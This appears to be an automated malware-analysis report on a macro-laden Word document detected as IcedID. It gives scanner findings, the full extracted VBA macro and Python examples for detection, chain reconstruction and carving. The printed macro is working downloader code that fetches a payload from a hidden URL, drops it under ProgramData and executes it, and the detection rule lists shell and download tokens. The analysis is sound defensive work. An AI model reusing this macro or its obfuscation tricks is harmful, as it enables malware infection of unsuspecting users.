Verdict: MALICIOUS
Risk Score: 230
Heuristics: 6
Findings

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0.
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings). The document contains a VBA project, so VBA macros are present.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Set yMhMp = CreateObject("Script" + gDSfv)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are reported in the finding's detail line.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:
  Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below were found in document text (OOXML body / shared strings). They are the XML namespace URIs (schemas.microsoft.com, schemas.openxmlformats.org) that Word writes into every OOXML package, not network indicators. The macro's actual download URL is not among them: it is stored reversed inside the AlternativeText of Shapes(1) and only reassembled at run time (see the macro preview under Extracted artifacts), so string extraction never sees it in clear.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
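To make the pairing rule concrete, here is an added Python re-implementation of the OLE_VBA_PCODE_AUTOEXEC_EXEC logic described in the findings, alongside the single-token OLE_VBA_AUTOOPEN and OLE_VBA_CREATEOBJ checks. This is example code, not the analyzer's own rule engine. The token lists are copied from the rule description above; the sample streams are constructed here (a trimmed copy of lines from this sample's macro, two controls that carry only one half of the pair, and a UTF-16LE stream standing in for a compiled stream that stores its literals wide).

```python
"""Pairing logic of OLE_VBA_PCODE_AUTOEXEC_EXEC, re-implemented as an added
example (not the analyzer's own rule code). Token lists are taken from the rule
description on this page; the sample streams below are constructed."""

# Auto-execution entry points and execution/download tokens, as listed by the rule.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream, tokens):
    """Return the members of `tokens` present in `stream` (str or bytes).

    Matching is a case-insensitive substring test on both the 8-bit and the
    UTF-16LE spelling of each token, so the same function works on decompressed
    VBA source and on compiled/cache streams where a literal may be stored wide.
    Substring (not whole-word) matching is deliberate: it is what lets "XMLHTTP"
    fire on "MSXML2.serverXMLHTTP" and "Shell" on the split literal "cript.shell".
    """
    data = stream.encode("latin-1", "replace") if isinstance(stream, str) else stream
    low = data.lower()          # bytes.lower() folds ASCII only, which is all we need
    hits = []
    for tok in tokens:
        t = tok.lower()
        if t.encode("latin-1") in low or t.encode("utf-16-le") in low:
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream):
    """OLE_VBA_PCODE_AUTOEXEC_EXEC: fires only when at least one auto-exec token
    AND at least one execution token occur in the same stream.
    Returns (fired, autoexec_hits, exec_hits)."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return (bool(auto) and bool(execs), auto, execs)


def scan_streams(streams):
    """Run the pairing rule plus the two single-token rules from this report over a
    {stream_name: str|bytes} mapping. Returns (stream, rule_id, severity, tokens)."""
    findings = []
    for name, data in streams.items():
        fired, auto, execs = pcode_autoexec_exec(data)
        if fired:
            findings.append((name, "OLE_VBA_PCODE_AUTOEXEC_EXEC", "high", auto + execs))
        if find_tokens(data, ("AutoOpen",)):
            findings.append((name, "OLE_VBA_AUTOOPEN", "low", ["AutoOpen"]))
        if find_tokens(data, ("CreateObject",)):
            findings.append((name, "OLE_VBA_CREATEOBJ", "high", ["CreateObject"]))
    return findings


# Constructed samples. SAMPLE_MALDOC is a trimmed copy of lines from the macro
# preview in this report; the other three are controls made up for the example.
SAMPLE_MALDOC = b"""Sub AutoOpen()
Dim dGgXs As New iekTC
BcgzQ = dGgXs.qyItw("MSXML2.serverXMLHTTP")
End Sub
Set yMhMp = CreateObject("Script" + gDSfv)
Set naxvj = CreateObject(pqKEC + "cript.shell")
"""
SAMPLE_AUTOOPEN_ONLY = b'Sub AutoOpen()\nMsgBox "hello"\nEnd Sub\n'   # entry point, no exec token
SAMPLE_EXEC_ONLY = b'Sub Helper()\nSet o = CreateObject("Scripting.FileSystemObject")\nEnd Sub\n'
# Stand-in for a compiled stream that stores its literals as UTF-16LE.
SAMPLE_WIDE = ("Document_Open".encode("utf-16-le") + b"\x00" * 4
               + "WinHttp.WinHttpRequest.5.1".encode("utf-16-le"))

if __name__ == "__main__":
    samples = {"ThisDocument": SAMPLE_MALDOC, "autoopen_only": SAMPLE_AUTOOPEN_ONLY,
               "exec_only": SAMPLE_EXEC_ONLY, "wide_pcode": SAMPLE_WIDE}
    for finding in scan_streams(samples):
        print(finding)
```

Run against the trimmed macro the pairing rule reports AutoOpen together with Shell, CreateObject and XMLHTTP, even though the macro never spells out "wscript.shell" or "Scripting.FileSystemObject" in one literal; the two controls show that an entry point without an execution token (or the reverse) stays silent, which is the property that keeps this rule quiet on ordinary document templates.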
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12102 bytes | 0378f11cee1876a996d132bc240d22fd43508421d81342acb7166efbb7d42be8 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qKlAh"
Sub Pwibp(BcgzQ, Optional ByVal IXkXi As String = "c:\programdata\LtGep.txt", Optional ByVal gDSfv As String = "ing.FileSystemObject")
' Glaciers cliches prescriptivism cannons towering partner
' Reunions broom molesters
' Horror
' Protectiveness clang publicly regents
' Circumscribing marching wigeons declassified
' Twisted lubbers emphatically starless subtitled
' Pawing midships intruders kindling refrain
' Lidless ox unburned slows authorise
' Gnawed singed whirring cheapest overtaken
' Parcels
' Surpassed unvisitable
' Delphi orthogonality frivol freaked expedition pour
' Officiated prosecutes installed
' Indirect discomforts pulses bogged
' Carnage courageous
' Megatons pathologically chunnel
' Cadences delusional aquarium
' Accelerometer wiper nudging cheater
Set yMhMp = CreateObject("Script" + gDSfv)
' Thickset
' Bipeds diagonalises expire stint
' Recites
' Debts provable statements diphthongs
Set SSDPU = yMhMp.CreateTextFile(IXkXi)
' Floppiest midges thinking froward
' Plagued shriek
' Astrophysicists
' Healed jumps rummaged crowds
' Uncurled mailer
SSDPU.WriteLine BcgzQ
' Lefthandedness mirrors bestiality
' Reunification succeeding
' Pariahs
' Stabilising sables mechanic
' Forefinger goading
' Teammate medicines decamped
' Dwarves
SSDPU.Close
' Fearlessness voters
' Devoured prostitute
' Woodcut cues worshipful excellencies
' Tragedies must schwa waif
' Opportunist buttoning blond drafters
' Redeploying daemon insignificance alterego
' Slavering barmaid plaza network
' Unresponsive thoughtlessness
' Cleanliness polytheistic impotence mealy
' Steed misgiving shilling sieve townsfolk begins
' Piety transformed
' Invocation
' Diverse
' Grassier childproof ancestral hundredweight structurally crustiest
' Distally folds
' Outbuildings furtive limbo
' Els
' Francs marls annexation haltingly bookworms nymphs
' Aperture
' Antiquities rosettes owning
' Traumatised speaks meaninglessly exacerbates bored
' Scars cant lows
' Marketing unlearn panther attach wimp
' Petered appals springbok
' Night message
' Napalm blazed flotsam
' Unselfish magnetisation sorrowfully
' Costarring cloning
' Perverseness rumbas realised haloed mule
' Contiguity handovers corked stoppered allurements
' Rustled
' Superhuman fluttered temporary epitaph coquettishly unnoticed
' Expansions reiterate tycoons incriminates therapy substrate
' Qualifiers transmits rejuvenated people yawned
End Sub
' Violates resemblance
' Endowment annal racialism fabricating adjudicators
' Polarity
' Ales corduroy reliably
' Transcript
' Rifled sounds undecided fanfare autonomic
Sub AutoOpen()
' Release
' Decompress overindulgent reared
' Abnegation interceded herald
' Meaningfulness disadvantageously
' Bookmarks impels bout conurbations
' Fancied expertness prostitutes byproducts nervously
' Miniskirt punt executable perceive druids defrost
' Discreetly permeate armholes sprites
' Slenderness untangling
' Simulates chaldron unallocated dad lobbying checkin
' Jackdaws extrapolation grind picked upland managed athletically
' Sealed spooled bilingual
' Insinuated vaccinated prosperity national
' Sugary elastin fulllength scintillators recurs calmer
' Nourish pains
' Tremendous insolvency cheeriest expresses throb
' Unconnected avoidance
' Philology gamekeepers loggerheads asocial
' Transitively disrespectfully pained poseurs
' Royalists alluring
' Leipzig rafting coughing heats
' Mileages scantiness
' Geek contingency disintegration
' Prevention apostates accredited housekeeping
' Sorcerer signaller photometrically
' Vertebra radiators
Dim dGgXs As New iekTC
' Playfellows scarcely reverberations
' Carboxyl camomile wides epitomises
' Octaves noiseless accented milord
' Situationist simplistic ewes bulwarks
' Robotic
' Correlation pantheistic legionary treatable
' Cowhand collarless fairs
BcgzQ = dGgXs.qyItw("MSXML2.serverXMLHTTP")
' Bung commune accelerometer appointments catches subtracts
' Underwood heart mosaics
' Forbear icicles greatcoat severer
' Debuts evacuation mistreat baffles
' Separately monaco riotously
' Wrist
' Cliffs cannonballs deadlocks baobabs
Pwibp oHFrs(BcgzQ)
' Somnambulist spit flareup
' Viva prospering lisbon
' Callus
' Commending bibliographical
' Weapons indaba gadded
' Commemorating heartwarming babas lido hyphenate
' Entertains demur
' Mistranslating
' Crisply invokable
' Typographer kleptomaniac entirety
' Caveman rich lump fiord workshops
' Pessimistically typify
' Sifts contrarily sensationalism
' Lights auditions
' Gelatinous selenium burns
TSAAx ICfFi(0) + "vr32 c:\programdata\LtGep.txt", "ws"
End Sub
Function OSvvN(mlBGV, gybZF)
' Underpay guest
' Lurched subscripts
' Professionally
' Needles banquet doodling
' Disappointed regionalisation affable pageantry bleeper
' Predilection officiated orphaned viewfinder
OSvvN = Split(mlBGV, gybZF)
End Function
Attribute VB_Name = "Ozgaj"
' Adherence
' Hives denominators potently
' Zoos
' Bigger winter baulking slipped
Function oHFrs(Xfejj)
' Interracial ramifies volts
' Cassocks provincial housing emissions leans hurdle
' Intensity resiting ambulances
' Lighting namely
' Moats superimpose
oHFrs = StrConv(Xfejj, vbUnicode)
' Insulators scourge levelling
' Scours harvest neutrino atomic
' Romanticism acquiescing readjustment frontline
' Unknowns deconstructive
' Parabolas jockeying franked transact
End Function
' Cadets monumental pervasiveness grasp
' Laconically polyhedron
' Byelection excursion promontories
' Beatitudes cliquey geologically
' Colourised
Function QanMi()
' Submitted prospectively debugged escapes tipsters insecure
' Branding relativist cairns tinpot fishhook fathers
' Wittily seminars tutored gotten journalist
' Coloure armlets
' Overdrawn gregariously focusing straddles hillocks bookings
' Hurtful jest
' Ignoring microcode anniversary
' Grisliest saucy
' Active maned tied
' Optimal microlight price autosuggestion virginity polishings botany
' Repetition acknowledgment spacesuit glutinous acceptance beggary
With ActiveDocument.shapes(1)
QanMi = .AlternativeText
End With
End Function
' Waywardness
' Medals creek sender palsy doctored
' Clearness morons
' Sightings uninsured chicks
' Happily hefty waitress socialists distinguished colt hydrocarbons
' Article capitalised
Function ICfFi(yPAjb)
' Cygnet juicy
' Obstructions decoying
' Centenarians rerouted panjandrum breadandbutter
' Graders vocalise corrective
' Amputated leaderships wine agonies comport clothespeg
' Predictive roars bloodstains
' Scrutineers palaeontology carelessly lots sweetie
' Extinction reclassified ringleader monition
' Foursome acclaims spikes
' Unbelieving substantive agony
OPxbM = QanMi()
zKbzO = OSvvN(OPxbM, "###")
gmFFC = zKbzO(yPAjb)
ICfFi = gmFFC
End Function
Attribute VB_Name = "iekTC"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Lamas warps part creme ingenuousness
' Pine sisterly tautologous shakeup
' Electrolytes bedsheets childhoods
' Regrettable miscomprehended brandish
' Captious unfixed
Function qyItw(cqZts)
' Welding stringy escorts
' Mummy interims incorrectly proactive
' Staleness rescuer aridity
' Bladed hisses aphorisms tediousness unvisitable arbitral
' Milieux adulterations
Dim KOaJL As Object
' Honking musketeer
' Subtractive timeless outpouring readiest
' Tracks mindbogglingly
' Distil glassier stencilled fags
' Frog legislatures whoa spotlight
' Apogee stowaway ancients opened conversations
' Penitents sugarplums phonemically collage
' Stenches activations restrains
' Burped
' Butchery
Set KOaJL = CreateObject(cqZts)
' Doffed clergy hark dewy whippet therewith boron
' Builders omnipresent bloke
' Quiescence coefficient gobbets levered
' Springboks
' Ephemera auk competently restaurateur heterosexist stray
' Dipolar undermining lamed personification dethroned
' Quotes divisibility incapacitate cadaverous megabytes
' Illegibility
' Earthly crumpet shrew empiric navels zebu
' Gutless revivifying shakes regenerate cud misstatement deflation
' Overdubbing
' Toothiest grouch florid beachcomber
' Compensator waxpaper milked imaginable unlicensed
' Hails hangouts
' Muteness climatological astonishes
' Incest hillwalking criminologists lifeguards graduates
' Bind exceed
' Belligerents designable
' Hindquarters estimated unloose shallows got
' Unfortunately cancerous inferring rigor
' Enticement malignantly
' Renaming coastlands poorness neediest
Rqnxo = ICfFi(1)
' Tempter policies infernally honeycombed
' Tailless furious
' Computable dehydrating invectives
' Felicity dessicated
KOaJL.Open "GET", Reverse(Rqnxo), False
' Distractedly shield
' Solely alloyed shuddered
' Cuckoos seared
' Bounding plunderers
KOaJL.Send
' Bailed pipelines usurping
' Sacs reeds
' Fragmenting orthographically
' Weedkiller goofy sieve necrophiliacs
' Bartender assyria exegesis metamorphosis aurorae
' Sensationalistic screened feinting discussed
' Herbalist photogenic pope
qyItw = KOaJL.responsebody
End Function
Attribute VB_Name = "nkmqO"
Sub TSAAx(fDhKw, pqKEC)
' Unclasped coercively symmetrising addenda
' Climates quenching ordinals
' Roofing walkout immovable
' Seduced godsend
' Marriage bamboo parliament
' Pandora cockatrices distended appending
' Puss mismatched
Set naxvj = CreateObject(pqKEC + "cript.shell")
' Woodshed advanced buffer daydreaming
' Bakehouse offence handicrafts removals entangler
' Pronunciations unhyphenated mouth
' Radiograph extorted plaits bridles
' Nonsenses moan terrapin glean
' Jetsam carry
' Rota overseen none dazed
' Poach relativistic zone
' Distillations highranking formerly signers
' Hinderer reflexive casually
' Serpent deterioration shack
' Axle penname crete flounced leftish
' Parenthesis taxonomy held
' Invitations corruptions denomination
' Conformational obtrusive unappeased bedmaker
' Bag creditors inducts bathtubs spectres
' Bead ignores turkish comradeinarms contain
' Proteges tipper
' Marshaller
' Brimstone crudity
' Causes stewardesses inscrutable complexes shuttering elbe
' Querying drenching might packhorse
' Quagga assigned
' Riskiness lineages storehouses
' Polishing sockets sonata
' Souled footway persistent fathomed
' Pajamas sweaters effete sling coining
' Unresisting bearskin
' Relishes enjoyer touches positive tracheal
' Surrounding backless bumper zoology codices drummer
' Militating undemocratic refreshments recapture
' Immortal iraqi activists baud
' Subordinating liberators
' Fuddled radish
' Cubs reason
' Greener flareup
' Birdsong understate announced scherzi
' Strangulation exotic
' Affront neophyte unfashionably
' Genially emerge
' Overexposed conferences telecommuting
' Lam pardoning
' Piccolo mudlarks sane flossing gad
' Cinematic matrimonial tuna snowed chants herons
' Wasting retitle catamarans semiconductors chairman
' Drowsy hooted
' Coquettishly
' Peerless screenwriter vandalising clasper gazebo lambs
naxvj.exec fDhKw
' Sos diminution mothering ileum unfertilised railed
' Colonising hydrodynamical meson
' Bootless dungeon inseparable jumpstart scribbles
' Recess flyers extrapolate
End Sub
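Read without the junk comments, AutoOpen() does three things: qyItw() creates MSXML2.serverXMLHTTP, takes element 1 of Shapes(1).AlternativeText (split on "###"), reverses it into a URL and fetches it; Pwibp(oHFrs(...)) runs the response body through StrConv(..., vbUnicode) and writes it to c:\programdata\LtGep.txt through Scripting.FileSystemObject; TSAAx() then has WScript.Shell execute element 0 of the alt text concatenated with "vr32 c:\programdata\LtGep.txt". The following Python is an added static reconstruction of that chain, not code from the page or from the malware author. The report does not show the shape's AlternativeText, so ALT_TEXT is a constructed stand-in: its element 0 is assumed to be "regs" (the obvious completion of "...vr32", but an inference) and its element 1 is a hypothetical URL stored reversed, as the macro expects. Only the literals visible in the macro are taken from the page.

```python
"""Static reconstruction of what AutoOpen() in the macro above does, as an added
example (not the page's code and not the malware author's). ALT_TEXT is a
constructed stand-in for ActiveDocument.Shapes(1).AlternativeText, which the
report does not show; "regs" and the URL are assumptions."""

PAYLOAD_PATH = r"c:\programdata\LtGep.txt"       # literal in Pwibp()'s default and TSAAx() call

# Constructed stand-in for Shapes(1).AlternativeText: "<cmd prefix>###<reversed url>".
HYPOTHETICAL_URL = "http://example.invalid/payload.dat"   # not from the sample
ALT_TEXT = "regs###" + HYPOTHETICAL_URL[::-1]             # "regs" is an assumption


def vba_reverse(text):
    """Mirror of the macro's Reverse(): Trim(), then reverse character by character."""
    return text.strip()[::-1]


def icffi(alt_text, index):
    """Mirror of ICfFi(): OSvvN() splits the alt text on "###", then one element is picked."""
    return alt_text.split("###")[index]


def progids():
    """The COM ProgIDs the macro assembles from split literals so that no single
    string in the source spells them out."""
    return {
        "fso": "Script" + "ing.FileSystemObject",   # Pwibp(): CreateObject("Script" + gDSfv)
        "shell": "ws" + "cript.shell",              # TSAAx(..., "ws"): CreateObject(pqKEC + "cript.shell")
        "http": "MSXML2.serverXMLHTTP",             # passed whole to qyItw()
    }


def emulate_strconv_writeline(body, codepage="latin-1"):
    """What Pwibp(oHFrs(body)) leaves on disk. oHFrs() is StrConv(body, vbUnicode),
    which decodes the downloaded bytes with the system ANSI code page; WriteLine on
    an FSO text file re-encodes to ANSI and appends CRLF. latin-1 is used here as a
    byte-transparent approximation: the round trip only preserves the payload on
    single-byte ANSI code pages (a DBCS locale would corrupt it)."""
    return body.decode(codepage, "replace").encode(codepage, "replace") + b"\r\n"


def reconstruct_chain(alt_text):
    """Ordered (stage, detail) list of the three calls AutoOpen() makes."""
    ids = progids()
    url = vba_reverse(icffi(alt_text, 1))                 # qyItw(): Reverse(ICfFi(1))
    cmd = icffi(alt_text, 0) + "vr32 " + PAYLOAD_PATH     # TSAAx(ICfFi(0) + "vr32 c:\programdata\LtGep.txt")
    return [
        ("download", f'{ids["http"]} GET {url} (synchronous, responsebody)'),
        ("drop", f'{ids["fso"]} CreateTextFile/WriteLine -> {PAYLOAD_PATH}'),
        ("execute", f'{ids["shell"]}.exec "{cmd}"'),
    ]


if __name__ == "__main__":
    for stage, detail in reconstruct_chain(ALT_TEXT):
        print(f"{stage:8s} {detail}")
    # Constructed 6-byte stand-in for a downloaded PE header: shows the CRLF that
    # WriteLine appends, which ends up as trailing data after the real content.
    print(emulate_strconv_writeline(b"MZ\x90\x00\x03\x00"))
```

Two triage consequences follow from this layout. First, neither the URL nor the first half of the command line is in the VBA at all, so olevba's string output will not contain them; they sit in the shape's alt text, which in a .docx/.docm package is usually the descr attribute of a wp:docPr element in word/document.xml. Second, the dropped file is the raw HTTP body plus a CRLF, written under c:\programdata with a .txt extension and then handed to a "...vr32" binary, so a Word process spawning that binary with a .txt argument under ProgramData is the behavioural signal to hunt for, independent of whatever the real alt text turns out to hold.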
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes | 1b34b1f53cf9e9102c4abbe86f07182cee2377aa2f296babde54f9531773b84a |

Detection for vbaProject_00.bin:
- ClamAV: Doc.Macro.ICEID1020-9781212-0
- Obfuscation or payload: unlikely (this is the analyzer's estimate for the binary part only; the macro source above still hides its ProgIDs in split literals, its URL in a reversed shape AlternativeText and its logic behind several hundred junk comment lines, so "unlikely" should not be read as "not obfuscated")
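The vbaProject_00.bin row is what a small carver produces. Below is an added Python version of that step (example code, not the analyzer's) that locates VBA project parts in an OOXML package through the content-type declarations in [Content_Types].xml, checks that each part starts with the OLE compound-file signature, and emits the same filename, kind, source, size and SHA-256 fields as the table. The package it runs on is built in memory and is not the analysed sample: its vbaProject.bin is a 512-byte stub header, so its digest differs from the one above.

```python
"""Carver for VBA project parts inside an OOXML package, as an added example
(not the analyzer's code). The container it is run on is constructed in memory."""
import hashlib
import io
import zipfile
import xml.etree.ElementTree as ET

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"           # compound file (CFB) signature
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def find_vba_parts(zf):
    """Part names declared as VBA projects in [Content_Types].xml, plus any member
    literally named vbaProject.bin (some generators omit the Override element)."""
    names = set()
    try:
        root = ET.fromstring(zf.read("[Content_Types].xml"))
    except KeyError:
        root = None
    if root is not None:
        for override in root.iter(f"{{{CT_NS}}}Override"):
            if override.get("ContentType") == VBA_CONTENT_TYPE:
                names.add(override.get("PartName", "").lstrip("/"))
    for name in zf.namelist():
        if name.lower().rsplit("/", 1)[-1] == "vbaproject.bin":
            names.add(name)
    return sorted(n for n in names if n)


def carve_vba_projects(package_bytes):
    """Return one artifact dict per VBA project part, with the same fields as the
    report's table, plus is_ole (whether the part starts with the CFB signature)."""
    artifacts = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for i, part in enumerate(find_vba_parts(zf)):
            data = zf.read(part)
            artifacts.append({
                "filename": f"vbaProject_{i:02d}.bin",
                "kind": "vba-project",
                "source": f"OOXML VBA project: {part}",
                "size": len(data),
                "sha256": sha256_hex(data),
                "is_ole": data.startswith(OLE_MAGIC),
            })
    return artifacts


STUB_PROJECT = OLE_MAGIC + b"\x00" * 504     # constructed 512-byte CFB-header-sized stub


def build_sample_package(with_vba=True):
    """Constructed minimal .docm-like container (not the analysed sample)."""
    overrides = ['<Override PartName="/word/document.xml" '
                 'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>']
    if with_vba:
        overrides.append(f'<Override PartName="/word/vbaProject.bin" '
                         f'ContentType="{VBA_CONTENT_TYPE}"/>')
    content_types = (f'<?xml version="1.0" encoding="UTF-8"?><Types xmlns="{CT_NS}">'
                     '<Default Extension="xml" ContentType="application/xml"/>'
                     + "".join(overrides) + "</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", STUB_PROJECT)
    return buf.getvalue()


if __name__ == "__main__":
    for art in carve_vba_projects(build_sample_package()):
        print(art)
```

Keying on the content type rather than only the file name matters because a part can be renamed while keeping its declared type; the is_ole flag catches the opposite case, a part declared as a VBA project that does not carry a compound-file header and so deserves a closer look before it is passed to olevba.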